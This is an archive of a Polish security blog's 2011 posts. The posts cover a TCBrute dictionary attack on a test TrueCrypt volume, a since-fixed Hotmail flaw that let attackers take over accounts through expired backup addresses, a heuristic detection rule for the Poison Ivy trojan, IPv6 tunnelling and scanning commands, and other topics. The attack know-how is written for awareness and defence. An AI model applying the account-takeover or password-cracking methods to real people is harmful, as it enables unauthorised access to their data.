HARD CORE SECURITY LAB

Sekurak, czyli nowy polski serwis o bezpieczeństwie!

2013-02-02T22:47:00.002+01:00

Krótko i na temat... wszystkich, którzy chcieliby znowu czytać moje teksty o bezpieczeństwie IT i nie tylko o tym, zapraszam do nowego serwisu!

Jak odzyskać (złamać) hasło do woluminu TrueCrypta?

2011-02-13T18:28:00.003+01:00

Szyfrowanie naszych danych z wykorzystaniem programów takich jak popularny TrueCrypt, może stanowić dla naszych sekretów bardzo skuteczną ochronę. Zastosowanie silnego szyfrowania wraz z odpowiednio silnym hasłem, może być nie lada wyzwanie dla organów ścigania poszukujących cyfrowych dowodów. Oczywiści w razie zapomnienia hasła, TrueCrypt powstrzyma przed dostępem do danych również uprawnionego właściciela informacji. Jak się jednak okazuje, odzyskanie (złamanie) hasła broniącego dostępu do zaszyfrowanego woluminu czasem jest jednak jak najbardziej wykonalne, a potrzebne do tego narzędzia są ogólnie dostępne. Spójrzmy na mały praktyczny przykład.

Załóżmy, że chcielibyśmy odzyskać (złamać) hasło broniące dostępu do pewnego testowego woluminu (TC_test) utworzonego za pomocą domyślnych ustawień TrueCrypta. Hasło dostępowe stanowi następująca względnie silna fraza:

45m0d3u52@!

W celu przeprowadzenia naszego eksperymentu skorzystamy z mało znanego programu TCBrute 2.5, który to znajduje się nadal w bardzo wczesnej fazie rozwojowej, jednak już pozwala na wykonania powyższego przykładowego zadania. TCbrute wbrew swej nazwie nie pozwala na przeprowadzania automatycznych ataków siłowych, a jedynie wspiera ataki słownikowe. Musimy więc przygotować sobie słownik potencjalnych haseł.

Dla uproszczenia, słownik wygenerowałem za pomocą programu Common User Passwords Profiler, z zachowaniem tych samych zasad co we wpisie Oto program, który jest w stanie odgadnąć twoje hasła! Założyłem więc, że dysponujemy pewną wiedzą o właścicielu hasła i na tej podstawie z pomocą programu CUPP powstał słownik zawierający 23892 hasła (słownik można pobrać tutaj). Teraz pozostaje nam już tylko skonfigurować TCBrute'a (wskazujemy plik z woluminem oraz słownik z hasłami):

Już po kilku minutach właściwe hasło zostało odnalezione:

Prędkość TCBrute'a nie zachwyca. Udało mi się osiągnąć góra kilkadziesiąt prób na sekundę. W praktyce wyklucza to więc poważne ataki polegające na sprawdzaniu wszystkich możliwych kombinacji dłuższych haseł. Z drugiej jednak strony, taka prędkość spokojnie pozwala na sprawdzenie słownika zawierającego kilkadziesiąt lub nawet kilkaset tysięcy haseł w całkiem rozsądnym czasie. W obecnej wersji program jest już w stanie rozłożyć obliczenia na wiele w pełni niezależnych wątków, dzięki czemu wielordzeniowe procesory/systemy powinny nam pozwolić na spore przyspieszenie całego procesu.

Jaki z tego wszystkiego płynie wniosek? TCbrute i podobne rozwiązania nie mogą oczywiście zagrozić bardzo silnym i z niczym nie kojarzącym się hasłom. Jeśli jednak nasze hasło stanowi fraza znane ze słowników haseł typowych, jest podobne do innych naszych haseł wykorzystywanych w różnych systemach informatycznych lub też kojarzy się z jakimiś informacjami ogólnie dostępnymi na nasze temat, to TCbrute z pewnością może posłużyć intruzowi do przeprowadzenia całkiem skutecznego ataku. Pamiętajmy również zawsze, że typowe ataki słownikowe to nie jedyne metody odzyskiwania haseł do zaszyfrowanych danych. Inne całkiem proste ataki mogą się okazać zabójczo skuteczne.

Oczywiście TCbrute może się również okazać przydatny osobom, które zapomniały hasła do własnego woluminu. Na podstawie dostępnych wspomnień hasła oraz znajomości własnych nawyków związanych z tworzeniem haseł, będziemy mogli w takim przypadku przygotować sobie słownik, który przy odrobinie szczęścia pozwoli nam na odzyskanie utraconego dostępu do własnych danych. W jednym i drugim przypadku warto jednak przede wszystkim zdawać sobie sprawę, że narzędzia pozwalające na słownikowe ataki na TrueCrypta istnieją i są ogólnie dostępne.

Ixquick, czyli anonimowa i bezpieczna wyszukiwarka?

2011-02-12T18:18:00.001+01:00

Czy zastanawiacie się czasem nad tym, jak wiele naszych sekretów można by poznać na podstawie samej tylko analizy naszych zapytań kierowanych do internetowych wyszukiwarek? Czy Google gromadzi naszą historię wyszukiwania? Oczywiście tak. Co więc zrobić, by w trakcie wyszukiwania mimowolnie nie zdradzać wszystkich swoich tajemnic? Można przykładowo skorzystać z pewnej anonimowej wyszukiwarki, która w dodatku może zwiększyć nasze bezpieczeństwo podczas odwiedzania poszczególnych zwracanych wyników...

Wyszukiwanie informacji dostępnych w rozmaitych zakamarkach Internetu nieodzownie kojarzy nam się z jedyną słuszną wyszukiwarką firmy Google. Niestety, popularne wyszukiwarki gromadzą całą historię wyszukiwania. Jeśli przykładowo korzystacie z Google Search będąc zalogowanym na swoje konto Google, sami możecie podejrzeć to, co na temat waszych poszukiwań wie internetowy gigant. Wystarczy tylko odwiedzić usługę Google Historia Online. Jeśli nawet nie korzystamy z wyszukiwarek jako zalogowani użytkownicy, to nasze poszukiwania i tak zostaną zapamiętane i skojarzone z naszym publicznym adresem IP...

Oczywiście możemy bronić swej prywatności za pomocą rozmaitych rozwiązań anonimizujących korzystanie z Google Search, takich jak chociażby projekt GoogleSharing. Możemy jednak również skorzystać z innej wyszukiwarki, która obiecuje nam nie tylko całkowitą anonimowość, ale również więcej trafnych wyników. Poza tym, jej specyfika sprawia, że w pewnym sensie będziemy również chronieni przed nieuczciwymi kampaniami reklamowymi, czy też zagrożeniami takimi jak Blackhat Search Engine Optimization. Spójrzmy więc pokrótce na interesujące możliwości mało znanej w Polsce wyszukiwarki Ixquick.

Najprawdziwsze anonimowe wyszukiwanie?

Ixquick jest metawyszukiwarką, czyli zwracane przez nią wyniki powstają w oparciu o wyniki pochodzące z innych popularnych wyszukiwarek. Zapytania są realizowane jednocześnie z wykorzystaniem zewnętrznych silników, a odpowiedni algorytm tworzy dla nas jednolitą listę wyników. Wyniki mogą być dokładniejsze w porównaniu do jakiejkolwiek innej zwykłej wyszukiwarki, dzięki interesującemu algorytmowi oceny tej samej witryny z punktu widzenia różnych wyszukiwarek.

Ixquick przyznaje stronie jedną gwiazdkę za każdą wyszukiwarkę, która umieściła ją w pierwszej dziesiątce swoich wyników. Pięć gwiazdek oznacza więc, że pięć różnych wyszukiwarek wysoko oceniło daną stronę. Taki wynik możemy więc uznać za bardzo wiarygodny. Jak wiemy, niektóre niepożądane strony internetowe mogą być zoptymalizowane tak, aby mogły oszukać algorytm wyszukiwania jednej z wyszukiwarek, ale jest to znacznie trudniejsze w przypadku, gdy wyszukiwarek jest kilka. W taki właśnie sposób Ixquick może nam więc pomóc w ochronie przed odwiedzeniem witryn wypromowanych za pomocą wspomnianego już Blackhat SEO.

Inną interesującą i bardzo unikalną cechą tej wyszukiwarki jest natomiast całkowita ochrona naszej prywatności. Oczywiście korzystając z Ixquick bezpośrednio nie odpytujemy żadnej innej wyszukiwarki (robi to za nas sam Ixquick), dzięki czemu żaden inny dostawca tego typu usług nie pozna naszych zainteresowań i sekretów. Poza tym, od stycznia 2009 roku sam Ixquick nie rejestruje już żadnych informacji na temat swych użytkowników (brak rejestracji adresów IP użytkowników oraz brak korzystania z plików cookie umożliwiających identyfikację użytkowników), dzięki czemu korzystając z jego usług otrzymujemy coś na kształt prawdziwego anonimowego wyszukiwania.

Mimo niewielkiej popularności tego typu metawyszukiwarek w Polsce, myślę że powyższe interesujące cechy Ixquick sprawiają, że warto się zainteresować tym przedsięwzięciem. Oczywiście sami nie upewnimy się co do tego, czy firma ta rzeczywiście nie rejestruje żadnych informacji na temat swych użytkowników. Mają o tym jednak świadczyć rozmaite certyfikaty, takie jak Europejski Certyfikat Prywatności. Ciekaw jestem, co myślicie na temat tych wszystkich zapewnień ze strony firmy Ixquick i czy bylibyście w stanie porzucić swoją ulubioną wyszukiwarkę na rzecz metawyszukiwarki oferującej anonimowe wyszukiwanie?

Kolejny sposób na przejęcie tysięcy kont poczty e-mail?

2011-02-05T19:18:00.003+01:00

Internetowi intruzi znają całą masę skutecznych sposobów na przejmowanie kontroli nad cudzymi kontami poczty elektronicznej. Mogą to być przykładowo ataki phishingowe, zgadywanie odpowiedzi na pytania pomocnicze, podsłuchiwanie haseł transmitowanych w postaci nieszyfrowanej oraz rozmaite inne proste podstępy. Wszystkie te metody wymagają jednak albo jakiejś interakcji z samym użytkownikiem usługi, albo też bazują na tym, że nie zachował on elementarnych zasad bezpieczeństwa. Dziś natomiast chciałbym ostrzec wszystkich czytelników HCSL przed inną, stosunkowo mało znaną i do tego całkiem skuteczną metodą przejmowania kontroli nad cudzymi kontami poczty elektronicznej.

Metoda, którą dziś chcę omówić, pozwalała przykładowo w ostatnim czasie na uzyskanie całkowitej kontroli nad tysiącami kont poczty w popularnym microsoftowym serwisie Hotmail. Spójrzmy na dostępny tutaj mechanizm resetowania hasła w powyższej usłudze.

Na pierwszy rzut oka wszystko wydaje się być w jak najlepszym porządku. Mamy możliwość skorzystania z mechanizmu resetowania hasła z wykorzystaniem zapasowego adresu e-mail zdefiniowanego na etapie zakładania naszego konta, a sam pomocniczy adres nie zostaje wyświetlony. Generalnie rzecz biorąc tego typu funkcja resetowania haseł jest uznawana za dość bezpieczną. Z pewnością jest w praktyce o wiele bezpieczniejsza od mechanizmu pytań pomocniczych (Panieńskie nazwisko matki?), niestety jest tak do czasu, gdy intruz może poznać pełne brzmienie adresów pomocniczych należących do poszczególnych użytkowników...

Jak się okazuje, w przypadku Hotmaila, w celu odkrycia całego adresu pomocniczego należącego do konkretnego użytkownika wystarczyło tylko... wyświetlić źródło powyższej strony! Obecnie błąd ten został już naprawiony, zastanówmy się jednak, na co tego typu sytuacja w praktyce pozwalała?

Na pierwszy rzut oka wydaje się, że powyższa przypadłość Hotmaila pozwalała jedynie na poznanie innego adresu e-mailowego należącego do konkretnego użytkownika. Nadal nie widać więc żadnego realnego zagrożenia dla samego konta w usłudze Hotmail? Nic bardziej mylnego. W praktyce wielu użytkowników serwisów pocztowych na etapie rejestracji konta jako adres pomocniczy podaje jakiś adres wymyślony (np. nie_podam_ci_mojego_maila@gmail.com) lub też jakiś własny, lecz jedynie okazjonalnie (lub nawet w ogóle już nie używany) używany adres. Bardzo często użytkownik korzystając potem z nowego adresu zapomina całkowicie o starym, który z powodu długiej nieaktywności zostaje po jakimś czasie (np. 6 miesięcy) po prostu usunięty.

W efekcie potencjalny intruz może zresetować hasło użytkownika z wykorzystaniem nieistniejącego adresu e-mail, czyli np. nie_podam_ci_mojego_maila@gmail.com. Jak tego dokonać? Wystarczy tylko założyć takie właśnie konto w usłudze Gmail i skorzystać z funkcji resetowania hasła... W tym momencie intruz uzyskuje kontrolę nad kontem pocztowym, a prawowity użytkownik usługi nie ma zielonego pojęcia dlaczego stało się tak, że nie może się zalogować na własne konto.

Z pewnością tego typu problem nie dotyczył jedynie Hotmaila i podobne sytuacje mogą mieć nadal miejsce w przypadku innych usług, zachęcam więc do sprawdzenia, czy przypadkiem usługa pocztowa (być może również usługi internetowe innego typu?) z której korzystacie, również w jakiś sposób nie ujawnia zapasowych adresów e-mail pozwalających na zmianę hasła dostępowego. Warto również sprawdzić, czy podane przez nas adresy zapasowe na pewno istnieją i czy to na pewno my mamy nad nimi kontrolę!

Wszystko to jasno obrazuje, że nawet osoby przywiązujące dużą wagę do bezpieczeństwa, mogą paść ofiarą udanych ataków. Niestety nigdy nie jesteśmy w stanie przewidzieć wszystkich potencjalnych scenariuszy ataków, zazwyczaj nie możemy również sami zapobiec zagrożeniom związanym z lukami obecnymi w wykorzystywanych przez nas usługach oraz serwisach internetowych... jak więc bronić się przed tego typu zagrożeniami?

Szkolenie z bezpieczeństwa sieci (rabat 150 zł)

2011-02-02T21:52:00.001+01:00

Wszystkie osoby zainteresowane zagadnieniami związanymi z bezpieczeństwem sieci komputerowych, zachęcam do wzięcia udziału w szkoleniu autorskim organizowanym przez firmę Securitum w dniach: 01-03 marca 2011, w Krakowie. Świetny dobór tematów, nacisk na praktyczne umiejętności oraz rozpatrywanie omawianych zagadnień zarówno z perspektywy intruza, jak i administratora systemu, wszystko to stanowi o unikalności szkolenia Bezpieczeństwo sieci.

Podczas warsztatów prezentowane są realne podatności i metody ochrony przed nimi. W ramach warsztatów możliwe są dodatkowo konsultacje z prowadzącym szkolenie -- w dowolnej tematyce związanej z bezpieczeństwem sieci.

W trakcie trzydniowych warsztatów:

Podsłuchasz rozmowę VoIP korzystając z fizycznych telefonów IP dostępnych w LAB-ie
Zobaczysz w jaki sposób można skonfigurować i ominąć systemy klasy IPS (Intrusion Prevention System).
Wykonasz atak na protokół routingu.
Wykonasz atak klasy MitM w środowisku switchowanym - na serwis chroniony przez SSL.
Wykonasz przechwycenie i modyfikację (niemal) dowolnej komunikacji sieciowej.
Nauczysz się w sprawny sposób wykrywać podatności w sieci.
Wykonasz (niemal) dowolną fragmentację ruchu IP.
Złamiesz dostęp do sieci chronionej przez IPsec.
Zobaczysz w jaki sposób otrzymać dostęp na poziomie systemu operacyjnego - poprzez SQL injection.
Zbudujesz własne narzędzie do testowania bezpieczeństwa sieci.
Otrzymasz w prezencie anglojęzyczną książkę o monitoringu bezpieczeństwa sieci - niedostępną na polskim rynku.
Nauczysz się metod ochrony sieci przed atakami.
I wiele, wiele więcej...

Warsztaty kierowane są do:

Pracowników departamentów bezpieczeństwa firm.
Administratorów systemów.
Pracowników działów IT.
Osób odpowiedzialnych za wdrażanie zabezpieczeń w organizacjach.
Osób pragnących usystematyzować / poszerzyć swoją wiedzę z zakresu bezpieczeństwa IT.

Zajęcia odbędą się z wykorzystaniem laptopów kursantów (formuła bring your own laptop), jednak przed szkoleniem każdy uczestnik otrzyma m.in. maszynę wirtualną z narzędziami, które będą wykorzystane podczas zajęć. Dodatkowe informacje oraz pełna agenda: szkolenie z bezpieczeństwa sieci.

Na wszystkich czytelników HCSL czekają kupony rabatowe. Wszyscy uczestnicy (firmy i osoby prywatne), którzy powołają się na serwis HARD CORE SECURITY LAB, mogą liczyć na zniżkę w wysokości 150 zł. Biorąc pod uwagę to, że tego typu profesjonalne, praktyczne szkolenia są w Polsce prawdziwą rzadkością, zachęcam wszystkich zainteresowanych do skorzystania z okazji do pogłębienia swej wiedzy z zakresu bezpieczeństwa sieci komputerowych.

Najgorszy haker wszech czasów?

2011-02-01T19:55:00.002+01:00

W miarę obiektywne wskazanie najlepszego hakera wszech czasów jest z pewnością nie lada wyzwaniem. W przeciwieństwie do ikon hack-kultury, prawdopodobnie osoba taka nie jest nawet w ogóle publicznie znana. Za to dość łatwo możemy nawet osobiście zbierać kandydatury do miana najgorszego hakera wszech czasów. Wystarczy tylko przygotować własny honeypot. Poza tym, podglądanie domorosłych włamywaczy penetrujących nasz system – przynętę, może być naprawdę zabawne. Z resztą sami zobaczcie!

Oto zapis starań pewnego włamywacza walczącego zaciekle z niegościnnym systemem – przynętą.

Prawda, że honeypot może być źródłem świetnej zabawy? Wszystko mogę zrozumieć, ale po co mu (jej?) ten W2Ksp3.exe?

W jaki sposób antywirusy rozpoznają złośliwe programy?

2011-01-31T00:01:00.004+01:00

Antywirusy są prawdopodobnie najpopularniejszym typem oprogramowania ochronnego oraz w ogóle jednymi z częściej stosowanych programów. Program tego typu najczęściej kojarzy nam się z rezydentnym monitorem śledzącym w czacie rzeczywistym wszystkie działania mające miejsce w naszym systemie operacyjnym i zdolnym do rozpoznania niezliczonej ilości zagrożeń. Jak to się jednak dzieje, że antywirusy są w stanie w miarę skutecznie rozpoznać setki tysięcy najróżniejszych złośliwych programów?

Większość użytkowników programów antywirusowych praktycznie w ogóle nie zdaje sobie sprawy z tego, w jaki sposób ich oprogramowanie ochronne radzi sobie z lokalizowaniem potencjalnych zagrożeń. Choćby podstawowa wiedza z tego zakresu jest jednak bardzo przydatna, bowiem pozwoli nam na lepsze zrozumienie słabych punktów dzisiejszego oprogramowania antywirusowego, a nawet realnych zagrożeń związanych z ich codziennym użytkowaniem! Wszystko to powinno nam więc pozwolić na bardziej świadome stosowanie dzisiejszych technologii ochronnych.

Najważniejszą częścią każdego dzisiejszego programu antywirusowego (oprócz tzw. silnika) jest baza sygnatur wirusów. Sygnatury wirusów to pewne (zazwyczaj bardzo zwięzłe) informacje, które pozwalają na w miarę jednoznaczne zidentyfikowanie danego typu lub nawet całej rodziny wirusów. Najpopularniejsze obecnie trzy typy sygnatur, to sygnatury powstałe z wykorzystaniem funkcji skrótu, sygnatury (wzorce) bajtowe oraz sygnatury heurystyczne. Spójrzmy pokrótce na wady oraz zalety wspomnianych metod identyfikowania potencjalnych zagrożeń.

Najprostszą oraz najłatwiejszą do praktycznego zastosowania metodą tworzenia sygnatur złośliwego oprogramowania jest oczywiście wykorzystanie do tego celu popularnych funkcji skrótu (np. MD5). Tzw. skrót (hash) powstaje w wyniku zastosowania matematycznej funkcji, która to w praktyce pozwala na przyporządkowanie dowolnie dużej liczbie (czyli np. dowolnemu programowi lub danym o dowolnej wielkości) pewnej stosunkowo niewielkiej wartości o ustalonym rozmiarze. Tak utworzony skrót dla znanego już złośliwego programu pozwala w przyszłości na w miarę jednoznaczne zidentyfikowanie danego wirusa.

Niestety zastosowanie tego typu sygnatur jest obarczone sporymi wadami. Nawet najdrobniejsza zmiana w kodzie złośliwego oprogramowania (nowy wariant wirusa, malware polimorficzny, itp.) oznacza, że stara sygnatura nie wykryje już nowych wersji wirusa. Poza tym, kolizje funkcji skrótu (czyli przypadki, gdy dla różnych wiadomości lub programów otrzymamy te same skróty) potencjalnie mogą być przyczyną bardzo niebezpiecznych dla naszego systemu wykryć fałszywych. Wszystko to powoduje, że rozwiązania antywirusowe w żadnym razie nie mogą polegać jedynie na tego typu sygnaturach.

Pewnym rozwiązaniem w przypadku malware'u polimorficznego lub złośliwych plików zawierających zmienne dane może być natomiast tzw. fuzzy hashing. Metody te generalnie pozwalają na utworzenie wspólnej sygnatury dla różnych danych wejściowych, które to jednak zawierają pewne cechy wspólne (np. programy zawierające wspólne fragmenty kodu). Tego typu metody są jednak dość wymagające pod względem obliczeniowym oraz nie gwarantują wcale bardzo dużej skuteczności. Wszystkich zainteresowanych tą tematyką zachęcam do zapoznania się z projektem ssdeep, w ramach którego powstał program implementujący metodę generowania skrótów CTPH (ang. Context Triggered Piecewise Hashes).

Kolejnym popularnym sposobem generowania sygnatur złośliwego oprogramowania jest wykorzystywanie do tego celu pewnych wybranych sekwencji bajtów obecnych w złośliwym kodzie lub w wykorzystywanych przez niego danych. Identyczne wzorce bajtowe możemy zazwyczaj odnaleźć we wszystkich wariantach danego złośliwego programu, dlatego też metoda ta jest w praktyce dość skuteczna w walce z całymi rodzinami wirusów. Natomiast prostota tej metody sprawia, że jest ona wykorzystywana praktycznie od zarania antywirusowych dziejów, aż po dziś dzień. Oczywiście metoda ta również może generować wykrycia fałszywe. Jeśli założymy, że sygnatura (wzorzec bajtowy) pewnego wirusa to "FF 5c 0c 4d c2 21 1d 18", to oczywiście dowolny plik (nawet najzwyklejszy plik tekstowy) zawierający taki ciąg bajtów będzie generował alert antywirusowy.

Współczesne programy antywirusowe wykorzystują również sygnatury heurystyczne. Generalnie mianem metod heurystycznych określa się w przypadku antywirusów wszystkie inne metody wykrywania zagrożeń, oprócz powyższych tradycyjnych metod sygnaturowych. Metody heurystyczne stanowią najbardziej skomplikowaną część arsenału każdego antywirusa. Ponadto praktycznie każdy producent antywirusów rozwija własne zastrzeżone algorytmy heurystyczne i właśnie na tym polu w największym stopniu może się wykazać swą innowacyjnością i potencjałem (tradycyjne sygnatury są zazwyczaj niemal identyczne w przypadku wielu różnych producentów -- znane jest nawet zjawisko wymieniania się tradycyjnymi sygnaturami z innymi producentami).

W praktyce heurystyczne metody wykrywania wirusów mogą się sprowadzać przykładowo do śledzenia wywołań API, zastosowania sand-boxingu połączonego ze śledzeniem zachowań poszczególnych programów, śledzenia anomalii występujących w systemie operacyjnym oraz systemie plików i wielu innych podobnych technik. W praktyce więc, sygnatura heurystyczna może przykładowo przyjąć formę kilku warunków śledzących wystąpienie sekwencji określonych wywołań API, które są charakterystyczne dla jakiejś rodziny wirusów lub nawet całej klasy złośliwego oprogramowania. Przykładowo dla złośliwego programu znanego jako Poison Ivy, heurystyczna sygnatura może mieć następującą postać:

Rule A

An API call to RtlMoveMemory with a string of "SOFTWARE\Classes\http\shell\open\commandV"

Rule B

An API call to CreateMutexA with a string of ")!VoqA.I4"

Rule C

An API call to GetSystemDirectory

if ( Rule A then Rule B then Rule C )

then

Process = PoisonIvy

Mimo, że metody heurystyczne dają nam pewną nadzieję na wykrycie nieznanych do tej pory zagrożeń, to oczywiście nie dają nam absolutnie żadnej gwarancji na stuprocentową skuteczność wykrywania oraz nie są wolne od zagrożenie generowania fałszywych alarmów.

Wiedząc już co nieco o metodach stosowanych przez współczesne antywirusy w celu wykrycia obecności złośliwego oprogramowania, możemy już teraz być pewni, że zapewnienia producentów tego typu oprogramowania o niemal całkowitej nieomylności ich produktów są wyssane z palca. Absolutnie żadne rozwiązanie antywirusowe nie daje nam obecnie gwarancji na obronę przed każdą infekcją. Jak również mogliśmy się przekonać, metody stosowane w celu wykrycia złośliwego oprogramowania są niejednokrotnie dość wymagające obliczeniowo, co z kolei tłumaczy znane chyba każdemu użytkownikowi antywirusów spowolnienie działania całego objętego ochroną systemu...

Wniosek? Współczesne programy antywirusowe są całkiem skuteczne i zazwyczaj w przypadku swobodnego surfowania oraz pobierania rozmaitości z Internetu, warto jednak z nich korzystać. Zawsze należy jednak również pamiętać o ich ograniczeniach, a nawet realnych zagrożeniach związanych z ich codziennym wykorzystaniem.

Dlaczego nie czytamy polityk prywatności? [infografika]

2011-01-28T20:24:00.003+01:00

Rejestrując się w ramach rozmaitych serwisów internetowych, zazwyczaj jesteśmy zmuszeni do zaakceptowania regulaminu, w tym polityki prywatności. To właśnie w tym dokumencie możemy niejednokrotnie znaleźć zapisy takie, jak informacja o tym, że dane na nasz temat mogą być swobodnie wykorzystywane, a czasem nawet sprzedawane firmom trzecim. Dlaczego więc pomimo coraz większych zagrożeń dla naszej prywatności, zazwyczaj w ogóle nie czytamy tych postanowień, a jedynie klikamy "zgadzam się"? Jak się okazuje, odpowiedź na to pytanie jest całkiem prosta...

Wstęp do (nie)bezpieczeństwa IP Next Generation

2011-01-23T15:50:00.007+01:00

Od wielu lat słyszymy już, że pula dostępnych adresów IP (w czwartej wersji tegoż protokołu) nieubłaganie wyczerpuje się. Zgodnie z niektórymi raportami organizacji IANA, sytuacja jest już co najmniej krytyczna. Niezależnie jednak od słuszności tego typu ocen i przewidywań, z pewnością już dziś warto zainteresować się protokołem IPv6. Spójrzmy więc na kilka praktycznych kwestii związanych z tematyką bezpieczeństwa IP Next Generation.

Protokół IPv6 (ang. Internet Protocol version 6), znany również jako IPNG (ang. Internet Protocol Next Generation), nie jest oczywiście niczym nowym, bowiem wyniki pierwszych prac nad tym standardem pojawiły się już w 1995 roku. Pomimo upływu wielu lat, wciąż na co dzień korzystamy jednak z IPv4, natomiast wiedza na temat IPv6 (nawet wśród osób zawodowo związanych z IT i/lub sieciami komputerowymi) jest zazwyczaj znikoma. Spójrzmy więc na kilka podstawowych informacji na temat internetowego protokołu nowej generacji oraz spróbujmy w sposób praktyczny rozpocząć własną przygodę z bezpieczeństwem IPv6.

Prace nad IPv6 rozpoczęły się przede wszystkim ze względu na problem małej ilości adresów obsługiwanych przez starą wersję protokołu. Otóż IPv4 wykorzystuje 32-bitowe adresowanie, co daje nam do dyspozycji (w praktyce nie wszystkie adresy możemy wykorzystać na potrzeby globalnej komunikacji) zaledwie nieco ponad 4 miliardy (2^32=4294967296) adresów. Problem ten ostatecznie ma rozwiązać 128-bitowe adresowanie zastosowane w IPv6, dzięki któremu otrzymujemy naprawdę ogromną (2^128) przestrzeń adresową. Pomijając dalsze nudne rozważania teoretyczne, przejdźmy do praktyki.

Adres IPv6 reprezentowany jest w postaci heksadecymalnej, z dwukropkiem co 16 bitów, np. 2001:0db8:0000:0000:0000:0000:1428:57ab. Dozwolone jest skrócenie jednego bloku zer (nie dotyczy zer na końcach sekcji) na podwójny dwukropek, początkowe zera w grupach również mogą być opuszczane, w związku z czym poniższe sposoby zapisu są prawidłowe i równoznaczne:

2001:0db8:0000:0000:0000:0000:1428:57ab
2001:0db8:0:0:0:0:1428:57ab
2001:0db8:0:0::1428:57ab
2001:0db8::1428:57ab
2001:db8::1428:57ab

Adres IPv6 może zostać zapisany w notacji CIDR, np. 2002:0db8:1234::/48 (gdzie 48 oznacza prefiks). Jeżeli zaś zachodzi potrzeba podania portu docelowego (np. w adresie URL), adres IPv6 otaczany jest nawiasami kwadratowymi, przykładowo:

http://[2001:0db8:85a3:08d3:1319:8a2e:0370:7344]:443/

Skoro jednak nasz ISP nadal zapewnia nam adres oraz komunikację jedynie z wykorzystaniem IPv4, to w jaki sposób możemy już dziś wkroczyć do świata IPv6? Okazuje się, że jest to całkiem proste. Wystarczy tylko skorzystać z darmowej usługi utworzenia tunelu IPv4-IPv6. Przykładem takiej usługi jest Hurricane Electric Free IPv6 Tunnel. Po dokonaniu rejestracji, wszystko sprowadza się praktycznie do podania naszego publicznego adresu IPv4 (w celu pomyślnego utworzenia tunelu, wskazany przez nas interfejs sieciowy musi grzecznie odpowiadać na komunikaty ICMP Echo Request, czyli mówiąc po ludzku musi być pingowalny):

W taki oto prosty sposób powstanie nasz tunel:

Teraz musimy już tylko zachęcić nasz system operacyjny do skorzystania z tunelu. Przykładowo w Windows 7 osiągniemy to za pomocą następujących poleceń:

netsh interface teredo set state disabled

netsh interface ipv6 add v6v4tunnel IP6Tunnel 79.191.225.158 216.66.84.46

netsh interface ipv6 add address IP6Tunnel 2001:470:1f14:12a7::2

netsh interface ipv6 add route ::/0 IP6Tunnel 2001:470:1f14:12a7::1

Natomiast systemy spod znaku sympatycznego pingwina, powinny zadowolić się następującą sekwencją poleceń:

modprobe ipv6

ip tunnel add he-ipv6 mode sit remote 216.66.84.46 local 79.191.225.158 ttl 255

ip link set he-ipv6 up

ip addr add 2001:470:1f14:12a7::2/64 dev he-ipv6

ip route add ::/0 dev he-ipv6

ip -f inet6 addr

W tej chwili powinniśmy już mieć kontakt ze światem IPv6, co możemy przetestować na przykładzie któregoś z adresów znalezionych tutaj.

Jak się okazuje, większość narzędzi znanych i wykorzystywanych przez osoby zainteresowane bezpieczeństwem systemów i sieci komputerowych, od dawna wspiera już IPv6. Spójrzmy na kilka prostych przykładów:

ping6 ipv6.google.com
ping -6 ipv6.google.com
nslookup -type=AAAA ipv6.google.com
nmap -PN -6 -p1-10000 ipv6.google.com
http://[2001:4860:800f::67]/ (w taki sposób należy wpisywać w przeglądarkach internetowych adresy IPv6)

Przy pomocy powyższych podstawowych narzędzi możemy przykładowo stwierdzić, że dany host za pośrednictwem IPv6 udostępnia całemu światu więcej rozmaitych usług w stosunku do usług dostępnych po IPv4 (np. w wyniku błędnej konfiguracji samego systemu lub reguł zapory), co może potencjalnie zostać wykorzystane przez intruza.

Dostępnych jest oczywiście również wiele bardziej zaawansowanych narzędzi. Przykładowo twórcy słynnej hydry (grupa The Hacker's Choice) udostępnili pod tym adresem cały pakiet interesujących i niedawno zaktualizowanych narzędzi do testowania bezpieczeństwa IPv6. Warto jednak zauważyć, że specyfika protokołu nowej generacji może znacznie utrudniać lub nawet uniemożliwiać niektóre testy bezpieczeństwa lub ataki. Wyobraźmy sobie przykładowo wykonanie zadania przeskanowania całego zakresu (lub choćby obszernego fragmentu) adresów IPv6!

Wszystkich, których temat bezpieczeństwa IPv6 naprawdę zainteresował, zachęcam ponadto do odwiedzenia witryny IPv6 Security, w ramach której Joe Klein zgromadził sporą dawkę interesujących informacji z tegoż zakresu. Warto również zainteresować się prezentacją z niedawnej konferencji 27th Chaos Communication Congress o wdzięcznym tytule Recent advances in IPv6 insecurities:

Na koniec zachęcam wszystkich czytelników do podzielenia się własnymi dotychczasowymi doświadczeniami z zakresu (nie)bezpieczeństwa IPv6!

Jak z pomocą robota zhakować sejf?

2011-01-19T22:00:00.002+01:00

Ataki typu brute force, czyli metody opierające się na sukcesywnym sprawdzaniu wszystkich możliwych kombinacji haseł lub kodów dostępowych, są oczywiście świetnie znane wszystkim osobom zainteresowanym tematyką bezpieczeństwa IT. Jak się jednak okazuje, tego typu zautomatyzowane ataki mogą również z powodzeniem zostać zastosowane w zupełnie zaskakujący sposób. Oto krótka historia o tym, jak komputerowi maniacy poradzili sobie z pewnym sejfem!

Wszystko zaczęło się od tego, że dwóch studentów ze słynnego Massachusetts Institute of Technology weszło w posiadanie pewnego tajemniczego sejfu. Kierowani wrodzoną (a może wyuczoną przez amerykańskie szkolnictwo wyższe?) ciekawością, postanowili opracować skuteczną metodę otwierania tego typu sejfów. Tak oto powstał działający prototyp robota zdolnego do odnalezienia właściwej kombinacji w ciągu zaledwie kilku godzin i to właśnie za pomocą ataku sprowadzającego się do sprawdzenia wszystkich możliwych kombinacji:

Powyższe zadanie wcale nie było takie proste. Sejf był wyposażony w zamek Sargent and Greenleaf 8500. Jest to jeden z najbardziej zaawansowanych zamków mechanicznych, a liczba wszystkich możliwych kombinacji to okrągły milion. Manualne testowanie poszczególnych kombinacji nie było więc oczywiście zbyt dobrym pomysłem. Tutaj świetnie sprawdził się zbudowany na tę okazję robot. Jednak nawet tak zautomatyzowany atak typu brute force wymagałby wielu długich godzin. Kolejnym kluczem do osiągnięcia założonego celu w krótkim czasie okazała się więc odpowiednia optymalizacja przestrzeni testowanych kombinacji.

Milion kombinacji to w tym przypadku jedynie teoria. Otóż ze względu na pewne mechaniczne ograniczenia samego zamka okazało się, że rzeczywisty zakres dozwolonych kombinacji można zredukować około dziesięciokrotnie! Dzięki odpowiedniej optymalizacji programu sterującego pracą robota, udało się ostatecznie zbudować prototyp zdolny do otwarcia sejfu w ciągu zaledwie kilku godzin. Całość jest sterowana za pomocą komputera poprzez port USB, natomiast oprogramowanie (2 tys. linii kodu) sterownika powstało w języku C.

